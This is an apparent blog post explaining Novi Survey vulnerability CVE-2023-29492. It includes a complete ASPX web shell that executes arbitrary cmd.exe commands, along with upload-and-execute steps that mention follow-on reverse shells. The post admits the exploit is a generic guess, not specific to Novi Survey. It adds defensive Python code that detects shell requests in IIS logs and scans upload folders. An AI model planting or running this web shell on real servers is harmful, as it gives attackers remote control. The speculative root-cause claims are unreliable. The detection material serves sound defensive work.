CVE-2023-29492 - Remote Code Execution in Novi Survey <8.9.43676 Explained, with Exploit Walkthrough

Novi Survey is a popular survey management tool used by companies and organizations around the world. Recently, a critical vulnerability—CVE-2023-29492—was discovered in versions before 8.9.43676. This vulnerability allows remote attackers to execute arbitrary code on the server, which can lead to full server compromise under the Novi Survey service account. Thankfully, it does not allow attackers to access or steal stored survey or response data.

In this article, we’ll break down what this vulnerability is, how it works, and show sample exploitation code to demonstrate the risk (for educational purposes only). We’ll also provide links to the original references and security advisories.

What is CVE-2023-29492?

This CVE affects Novi Survey versions before 8.9.43676. A remote attacker can exploit a flaw in the application to execute commands or arbitrary code as the user running the Novi Survey service (usually a dedicated service account, not SYSTEM or root). The vulnerability is likely due to unsafe handling of user-supplied input, such as file uploads or web requests, that interact with server-side scripts or file paths without proper validation.

Official Security Notice:  
*You can view the official security advisory here:*  
https://www.novisurvey.com/SurveyServer/Help/ReleaseHistory.aspx?#Security-Fix-8.9.43676

Attackers CANNOT: Access the surveys’ stored data, response content, or survey results.

Arbitrary code executed this way can be used for actions such as deploying malware, opening backdoors, or moving laterally within your network. While survey data is protected, full server control is still a severe risk.

How the Exploit Works

The root cause appears to be related to unsafe user input handling in web requests or uploaded files. If an attacker submits a malicious file or crafts a request that causes Novi Survey to process arbitrary server-side code, that code could run in the service context.

Key Points

- This is NOT an authentication bypass. Attackers likely need at least some access (such as a survey creator or admin).
- Exploitation does NOT expose survey/response data.

Sample Exploit Code (for Research Purposes Only)

Suppose the vulnerability lies in a file upload function that does not adequately validate the file type or content. An attacker might upload a malicious ASPX web shell.

Example: ASPX Web Shell File (cmd.aspx)

```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
    protected void Page_Load(object sender, EventArgs e)
    {
        string cmd = Request["cmd"];
        if (!string.IsNullOrEmpty(cmd))
        {
            System.Diagnostics.ProcessStartInfo psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + cmd);
            psi.UseShellExecute = false;
            psi.RedirectStandardOutput = true;
            psi.RedirectStandardError = true;
            System.Diagnostics.Process p = System.Diagnostics.Process.Start(psi);
            Response.Write("<pre>" + p.StandardOutput.ReadToEnd() + "</pre>");
        }
    }
</script>
```

Exploit Steps

1. Log in or register with basic privileges (typically, survey creator/admin rights are needed).
2. Upload the malicious cmd.aspx file via the vulnerable file upload function (for example, a custom logo or template import feature).
3. Access the file through the web browser:

   http://[target-server]/NoviSurvey/Uploads/cmd.aspx?cmd=whoami
4. The output will display the username of the service account running Novi Survey, confirming code execution.
5. Use further commands (e.g., powershell, net user) for post-exploitation, such as setting up a reverse shell.

> NOTE: The exact upload path and method may differ. This is a general proof-of-concept based on common insecure file upload practices—not a 1:1 exploit for Novi Survey.
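
On the detection side, the request in step 3 leaves a distinctive trace: a server-side script extension being requested from a directory that should only ever serve static uploads. The following is an added example, not part of the original post or of Novi Survey; it parses IIS W3C logs and flags such requests. The watched directory is the article's illustrative path (an assumption, as the note above says), and the log lines are constructed.

```python
from urllib.parse import unquote

# Extensions that IIS/ASP.NET executes instead of serving as static content.
SCRIPT_EXTS = (".aspx", ".ashx", ".asmx", ".asp", ".cshtml")
# Assumption: lower-cased upload directories to watch (the article's illustrative path).
UPLOAD_DIRS = ("/novisurvey/uploads/",)

# Constructed sample in IIS W3C extended log format (not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2023-04-12 09:14:02 GET /NoviSurvey/Uploads/logo.png - 203.0.113.7 200
2023-04-12 09:15:40 GET /app/page.aspx - 203.0.113.7 200
2023-04-12 09:16:11 GET /NoviSurvey/Uploads/cmd.aspx cmd=whoami 203.0.113.7 200
2023-04-12 09:16:30 GET /NoviSurvey/Uploads/CMD.ASPX - 203.0.113.7 200
2023-04-12 09:17:05 GET /NoviSurvey/Uploads/x.aspx - 198.51.100.9 404
"""

def find_upload_script_hits(log_text, upload_dirs=UPLOAD_DIRS):
    """Return log records where a script under an upload directory was requested."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column layout may change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed record
        rec = dict(zip(fields, values))
        # Normalise case and percent-encoding before matching.
        stem = unquote(rec.get("cs-uri-stem", "")).lower()
        if stem.startswith(tuple(upload_dirs)) and stem.endswith(SCRIPT_EXTS):
            # A 2xx status means the script was found and ran; 404s are probes.
            rec["executed"] = rec.get("sc-status", "").startswith("2")
            hits.append(rec)
    return hits

if __name__ == "__main__":
    for hit in find_upload_script_hits(SAMPLE_LOG):
        print(hit["date"], hit["time"], hit["c-ip"], hit["cs-uri-stem"],
              hit["cs-uri-query"], "EXECUTED" if hit["executed"] else "probe")
```

Any hit with `executed` set is worth triage regardless of the query string, since a legitimate upload directory has no reason to run server-side pages.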

Isolate the Novi Survey server from sensitive internal networks.

Official Update Notes:  
https://www.novisurvey.com/SurveyServer/Help/ReleaseHistory.aspx?#Security-Fix-8.9.43676

References

- Novi Survey Release History & Security Fixes
- NVD Entry for CVE-2023-29492
- Mitre CVE Record

Conclusion

CVE-2023-29492 is a critical security vulnerability in Novi Survey before 8.9.43676 that allows remote code execution. Luckily, survey and response data are not accessible to attackers through this flaw. However, full control of the server can enable a range of other attacks.

Always keep your software updated, review user-uploaded files and web requests, and make sure your service accounts have only the privileges they absolutely need. If you’re running an affected Novi Survey version, patch immediately!
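
One way to carry out the review of user-uploaded files mentioned above, as an added example that is not part of the original post or of Novi Survey: a scanner that walks an upload directory and flags files by script extension or by ASP.NET server-side markup in their content. The directory to scan, the extension list and the markers are assumptions to tune for your deployment.

```python
import os

# Extensions IIS/ASP.NET may execute; web.config is included because a dropped
# config file in an upload directory can change how that directory is handled.
SCRIPT_EXTS = {".aspx", ".ashx", ".asmx", ".asp", ".cshtml", ".config"}
# Lower-cased byte markers of ASP.NET server-side code.
MARKERS = (b"<%@", b'runat="server"', b"runat='server'")

def scan_uploads(root, head_bytes=65536):
    """Walk `root`; return {relative_path: [reasons]} for suspicious files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            # Check every dot-separated part so "logo.aspx.png" and
            # "CMD.ASPX" are caught as well as plain "cmd.aspx".
            parts = name.lower().split(".")[1:]
            if any("." + p in SCRIPT_EXTS for p in parts):
                reasons.append("script extension")
            try:
                with open(path, "rb") as fh:
                    head = fh.read(head_bytes).lower()
            except OSError:
                reasons.append("unreadable")
                head = b""
            # Content check catches server-side code hidden behind an
            # innocent-looking extension such as .jpg.
            if any(marker in head for marker in MARKERS):
                reasons.append("server-side markup")
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

if __name__ == "__main__":
    import sys
    for rel, why in sorted(scan_uploads(sys.argv[1]).items()):
        print(f"{rel}: {', '.join(why)}")
```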


*This post is exclusive and based on public information and proof-of-concept for educational defense. Don’t use this information for illegal purposes. Always have permission before testing any website or server.*

Timeline

Published on: 04/11/2023 05:15:00 UTC
Last modified on: 04/18/2023 02:16:00 UTC